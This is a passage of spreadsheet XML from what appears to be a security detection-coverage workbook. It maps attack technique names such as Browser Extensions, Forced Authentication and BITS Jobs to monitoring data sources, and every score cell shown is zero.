        <v>0</v>
      </c>
      <c r="H169" s="14">
        <v>0</v>
      </c>
      <c r="I169" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K169" s="46" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="170" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A170" s="43" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="41" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C170" s="45"/>
      <c r="D170" s="45"/>
      <c r="E170" s="45"/>
      <c r="F170" s="14">
        <v>0</v>
      </c>
      <c r="G170" s="14">
        <v>0</v>
      </c>
      <c r="H170" s="14">
        <v>0</v>
      </c>
      <c r="I170" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K170" s="46" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="171" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A171" s="43" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="41" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C171" s="45"/>
      <c r="D171" s="45"/>
      <c r="E171" s="45"/>
      <c r="F171" s="14">
        <v>0</v>
      </c>
      <c r="G171" s="14">
        <v>0</v>
      </c>
      <c r="H171" s="14">
        <v>0</v>
      </c>
      <c r="I171" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K171" s="46" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="172" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A172" s="43" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="41" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C172" s="45"/>
      <c r="D172" s="45"/>
      <c r="E172" s="45"/>
      <c r="F172" s="14">
        <v>0</v>
      </c>
      <c r="G172" s="14">
        <v>0</v>
      </c>
      <c r="H172" s="14">
        <v>0</v>
      </c>
      <c r="I172" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K172" s="46" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="173" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A173" s="43" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="41" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C173" s="45"/>
      <c r="D173" s="45"/>
      <c r="E173" s="45"/>
      <c r="F173" s="14">
        <v>0</v>
      </c>
      <c r="G173" s="14">
        <v>0</v>
      </c>
      <c r="H173" s="14">
        <v>0</v>
      </c>
      <c r="I173" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K173" s="46" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="174" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A174" s="43" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="41" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C174" s="45"/>
      <c r="D174" s="45"/>
      <c r="E174" s="45"/>
      <c r="F174" s="14">
        <v>0</v>
      </c>
      <c r="G174" s="14">
        <v>0</v>
      </c>
      <c r="H174" s="14">
        <v>0</v>
      </c>
      <c r="I174" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K174" s="46" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="175" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A175" s="43" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="41" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
      <c r="C175" s="45"/>
      <c r="D175" s="45"/>
      <c r="E175" s="45"/>
      <c r="F175" s="14">
        <v>0</v>
      </c>
      <c r="G175" s="14">
        <v>0</v>
      </c>
      <c r="H175" s="14">
        <v>0</v>
      </c>
      <c r="I175" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K175" s="46" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="176" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A176" s="43" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="41" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:B)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
      <c r="C176" s="45"/>
      <c r="D176" s="45"/>
      <c r="E176" s="45"/>
      <c r="F176" s="14">
        <v>0</v>
      </c>
      <c r="G176" s="14">
        <v>0</v>
      </c>
      <c r="H176" s="14">
        <v>0</v>
      </c>
      <c r="I176" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K176" s="46" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
    </row>
    <row r="177" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A177" s="43" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="41" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C177" s="45"/>
      <c r="D177" s="45"/>
      <c r="E177" s="45"/>
      <c r="F177" s="14">
        <v>0</v>
      </c>
      <c r="G177" s="14">
        <v>0</v>
      </c>
      <c r="H177" s="14">
        <v>0</v>
      </c>
      <c r="I177" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K177" s="46" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="178" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A178" s="43" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="41" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C178" s="45"/>
      <c r="D178" s="45"/>
      <c r="E178" s="45"/>
      <c r="F178" s="14">
        <v>0</v>
      </c>
      <c r="G178" s="14">
        <v>0</v>
      </c>
      <c r="H178" s="14">
        <v>0</v>
      </c>
      <c r="I178" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K178" s="46" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="179" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A179" s="43" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="41" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C179" s="45"/>
      <c r="D179" s="45"/>
      <c r="E179" s="45"/>
      <c r="F179" s="14">
        <v>0</v>
      </c>
      <c r="G179" s="14">
        <v>0</v>
      </c>
      <c r="H179" s="14">
        <v>0</v>
      </c>
      <c r="I179" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K179" s="46" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="180" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A180" s="43" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="41" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C180" s="45"/>
      <c r="D180" s="45"/>
      <c r="E180" s="45"/>
      <c r="F180" s="14">
        <v>0</v>
      </c>
      <c r="G180" s="14">
        <v>0</v>
      </c>
      <c r="H180" s="14">
        <v>0</v>
      </c>
      <c r="I180" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K180" s="46" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="181" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A181" s="43" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="41" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C181" s="45"/>
      <c r="D181" s="45"/>
      <c r="E181" s="45"/>
      <c r="F181" s="14">
        <v>0</v>
      </c>
      <c r="G181" s="14">
        <v>0</v>
      </c>
      <c r="H181" s="14">
        <v>0</v>
      </c>
      <c r="I181" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K181" s="46" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="182" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A182" s="43" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="41" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C182" s="45"/>
      <c r="D182" s="45"/>
      <c r="E182" s="45"/>
      <c r="F182" s="14">
        <v>0</v>
      </c>
      <c r="G182" s="14">
        <v>0</v>
      </c>
      <c r="H182" s="14">
        <v>0</v>
      </c>
      <c r="I182" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K182" s="46" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="183" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A183" s="43" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="41" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C183" s="45"/>
      <c r="D183" s="45"/>
      <c r="E183" s="45"/>
      <c r="F183" s="14">
        <v>0</v>
      </c>
      <c r="G183" s="14">
        <v>0</v>
      </c>
      <c r="H183" s="14">
        <v>0</v>
      </c>
      <c r="I183" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K183" s="46" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="184" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A184" s="43" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="41" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C184" s="45"/>
      <c r="D184" s="45"/>
      <c r="E184" s="45"/>
      <c r="F184" s="14">
        <v>0</v>
      </c>
      <c r="G184" s="14">
        <v>0</v>
      </c>
      <c r="H184" s="14">
        <v>0</v>
      </c>
      <c r="I184" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K184" s="46" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="185" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A185" s="43" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="41" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C185" s="45"/>
      <c r="D185" s="45"/>
      <c r="E185" s="45"/>
      <c r="F185" s="14">
        <v>0</v>
      </c>
      <c r="G185" s="14">
        <v>0</v>
      </c>
      <c r="H185" s="14">
        <v>0</v>
      </c>
      <c r="I185" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K185" s="46" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="186" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A186" s="43" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="41" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C186" s="45"/>
      <c r="D186" s="45"/>
      <c r="E186" s="45"/>
      <c r="F186" s="14">
        <v>0</v>
      </c>
      <c r="G186" s="14">
        <v>0</v>
      </c>
      <c r="H186" s="14">
        <v>0</v>
      </c>
      <c r="I186" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K186" s="46" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
    </row>
    <row r="187" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A187" s="43" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="41" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C187" s="45"/>
      <c r="D187" s="45"/>
      <c r="E187" s="45"/>
      <c r="F187" s="14">
        <v>0</v>
      </c>
      <c r="G187" s="14">
        <v>0</v>
      </c>
      <c r="H187" s="14">
        <v>0</v>
      </c>
      <c r="I187" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K187" s="46" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
    </row>
    <row r="188" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A188" s="43" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="41" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C188" s="45"/>
      <c r="D188" s="45"/>
      <c r="E188" s="45"/>
      <c r="F188" s="14">
        <v>0</v>
      </c>
      <c r="G188" s="14">
        <v>0</v>
      </c>
      <c r="H188" s="14">
        <v>0</v>
      </c>
      <c r="I188" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K188" s="46" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
    </row>
    <row r="189" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A189" s="43" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="41" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C189" s="45"/>
      <c r="D189" s="45"/>
      <c r="E189" s="45"/>
      <c r="F189" s="14">
        <v>0</v>
      </c>
      <c r="G189" s="14">
        <v>0</v>
      </c>
      <c r="H189" s="14">
        <v>0</v>
      </c>
      <c r="I189" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K189" s="46" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
    </row>
    <row r="190" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A190" s="43" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="41" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:B)</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="C190" s="45"/>
      <c r="D190" s="45"/>
      <c r="E190" s="45"/>
      <c r="F190" s="14">
        <v>0</v>
      </c>
      <c r="G190" s="14">
        <v>0</v>
      </c>
      <c r="H190" s="14">
        <v>0</v>
      </c>
      <c r="I190" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K190" s="46" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="191" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A191" s="43" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="41" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C191" s="45"/>
      <c r="D191" s="45"/>
      <c r="E191" s="45"/>
      <c r="F191" s="14">
        <v>0</v>
      </c>
      <c r="G191" s="14">
        <v>0</v>
      </c>
      <c r="H191" s="14">
        <v>0</v>
      </c>
      <c r="I191" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K191" s="46" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="192" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A192" s="43" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="41" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C192" s="45"/>
      <c r="D192" s="45"/>
      <c r="E192" s="45"/>
      <c r="F192" s="14">
        <v>0</v>
      </c>
      <c r="G192" s="14">
        <v>0</v>
      </c>
      <c r="H192" s="14">
        <v>0</v>
      </c>
      <c r="I192" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K192" s="46" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="193" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A193" s="43" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="41" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C193" s="45"/>
      <c r="D193" s="45"/>
      <c r="E193" s="45"/>
      <c r="F193" s="14">
        <v>0</v>
      </c>
      <c r="G193" s="14">
        <v>0</v>
      </c>
      <c r="H193" s="14">
        <v>0</v>
      </c>
      <c r="I193" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K193" s="46" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="194" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A194" s="43" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="41" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C194" s="45"/>
      <c r="D194" s="45"/>
      <c r="E194" s="45"/>
      <c r="F194" s="14">
        <v>0</v>
      </c>
      <c r="G194" s="14">
        <v>0</v>
      </c>
      <c r="H194" s="14">
        <v>0</v>
      </c>
      <c r="I194" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K194" s="46" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="195" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A195" s="43" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="41" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C195" s="45"/>
      <c r="D195" s="45"/>
      <c r="E195" s="45"/>
      <c r="F195" s="14">
        <v>0</v>
      </c>
      <c r="G195" s="14">
        <v>0</v>
      </c>
      <c r="H195" s="14">
        <v>0</v>
      </c>
      <c r="I195" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K195" s="46" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="196" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A196" s="43" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="41" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:B)</f>
        <v>Supply Chain Compromise</v>
      </c>
      <c r="C196" s="45"/>
      <c r="D196" s="45"/>
      <c r="E196" s="45"/>
      <c r="F196" s="14">
        <v>0</v>
      </c>
      <c r="G196" s="14">
        <v>0</v>
      </c>
      <c r="H196" s="14">
        <v>0</v>
      </c>
      <c r="I196" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K196" s="46" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
    </row>
    <row r="197" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A197" s="43" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="41" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:B)</f>
        <v>Compromise Hardware Supply Chain</v>
      </c>
      <c r="C197" s="45"/>
      <c r="D197" s="45"/>
      <c r="E197" s="45"/>
      <c r="F197" s="14">
        <v>0</v>
      </c>
      <c r="G197" s="14">
        <v>0</v>
      </c>
      <c r="H197" s="14">
        <v>0</v>
      </c>
      <c r="I197" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K197" s="46" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
    </row>
    <row r="198" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A198" s="43" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="41" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C198" s="45"/>
      <c r="D198" s="45"/>
      <c r="E198" s="45"/>
      <c r="F198" s="14">
        <v>0</v>
      </c>
      <c r="G198" s="14">
        <v>0</v>
      </c>
      <c r="H198" s="14">
        <v>0</v>
      </c>
      <c r="I198" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K198" s="46" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
    </row>
    <row r="199" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A199" s="43" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="41" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C199" s="45"/>
      <c r="D199" s="45"/>
      <c r="E199" s="45"/>
      <c r="F199" s="14">
        <v>0</v>
      </c>
      <c r="G199" s="14">
        <v>0</v>
      </c>
      <c r="H199" s="14">
        <v>0</v>
      </c>
      <c r="I199" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K199" s="46" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
    </row>
    <row r="200" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A200" s="43" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="41" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:B)</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="C200" s="45"/>
      <c r="D200" s="45"/>
      <c r="E200" s="45"/>
      <c r="F200" s="14">
        <v>0</v>
      </c>
      <c r="G200" s="14">
        <v>0</v>
      </c>
      <c r="H200" s="14">
        <v>0</v>
      </c>
      <c r="I200" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K200" s="46" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
    </row>
    <row r="201" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A201" s="43" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="41" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:B)</f>
        <v>Hardware Additions</v>
      </c>
      <c r="C201" s="45"/>
      <c r="D201" s="45"/>
      <c r="E201" s="45"/>
      <c r="F201" s="14">
        <v>0</v>
      </c>
      <c r="G201" s="14">
        <v>0</v>
      </c>
      <c r="H201" s="14">
        <v>0</v>
      </c>
      <c r="I201" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K201" s="46" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
    </row>
    <row r="202" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A202" s="43" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="41" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:B)</f>
        <v>Password Policy Discovery</v>
      </c>
      <c r="C202" s="45"/>
      <c r="D202" s="45"/>
      <c r="E202" s="45"/>
      <c r="F202" s="14">
        <v>0</v>
      </c>
      <c r="G202" s="14">
        <v>0</v>
      </c>
      <c r="H202" s="14">
        <v>0</v>
      </c>
      <c r="I202" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K202" s="46" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="203" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A203" s="43" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="41" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:B)</f>
        <v>Indirect Command Execution</v>
      </c>
      <c r="C203" s="45"/>
      <c r="D203" s="45"/>
      <c r="E203" s="45"/>
      <c r="F203" s="14">
        <v>0</v>
      </c>
      <c r="G203" s="14">
        <v>0</v>
      </c>
      <c r="H203" s="14">
        <v>0</v>
      </c>
      <c r="I203" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K203" s="46" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="204" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A204" s="43" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="41" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="C204" s="45"/>
      <c r="D204" s="45"/>
      <c r="E204" s="45"/>
      <c r="F204" s="14">
        <v>0</v>
      </c>
      <c r="G204" s="14">
        <v>0</v>
      </c>
      <c r="H204" s="14">
        <v>0</v>
      </c>
      <c r="I204" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K204" s="46" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
    </row>
    <row r="205" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A205" s="43" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="41" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:B)</f>
        <v>User Execution</v>
      </c>
      <c r="C205" s="45"/>
      <c r="D205" s="45"/>
      <c r="E205" s="45"/>
      <c r="F205" s="14">
        <v>0</v>
      </c>
      <c r="G205" s="14">
        <v>0</v>
      </c>
      <c r="H205" s="14">
        <v>0</v>
      </c>
      <c r="I205" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K205" s="46" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="206" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A206" s="43" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="41" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:B)</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="C206" s="45"/>
      <c r="D206" s="45"/>
      <c r="E206" s="45"/>
      <c r="F206" s="14">
        <v>0</v>
      </c>
      <c r="G206" s="14">
        <v>0</v>
      </c>
      <c r="H206" s="14">
        <v>0</v>
      </c>
      <c r="I206" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K206" s="46" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
    </row>
    <row r="207" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A207" s="43" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="41" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:B)</f>
        <v>Port Knocking</v>
      </c>
      <c r="C207" s="45"/>
      <c r="D207" s="45"/>
      <c r="E207" s="45"/>
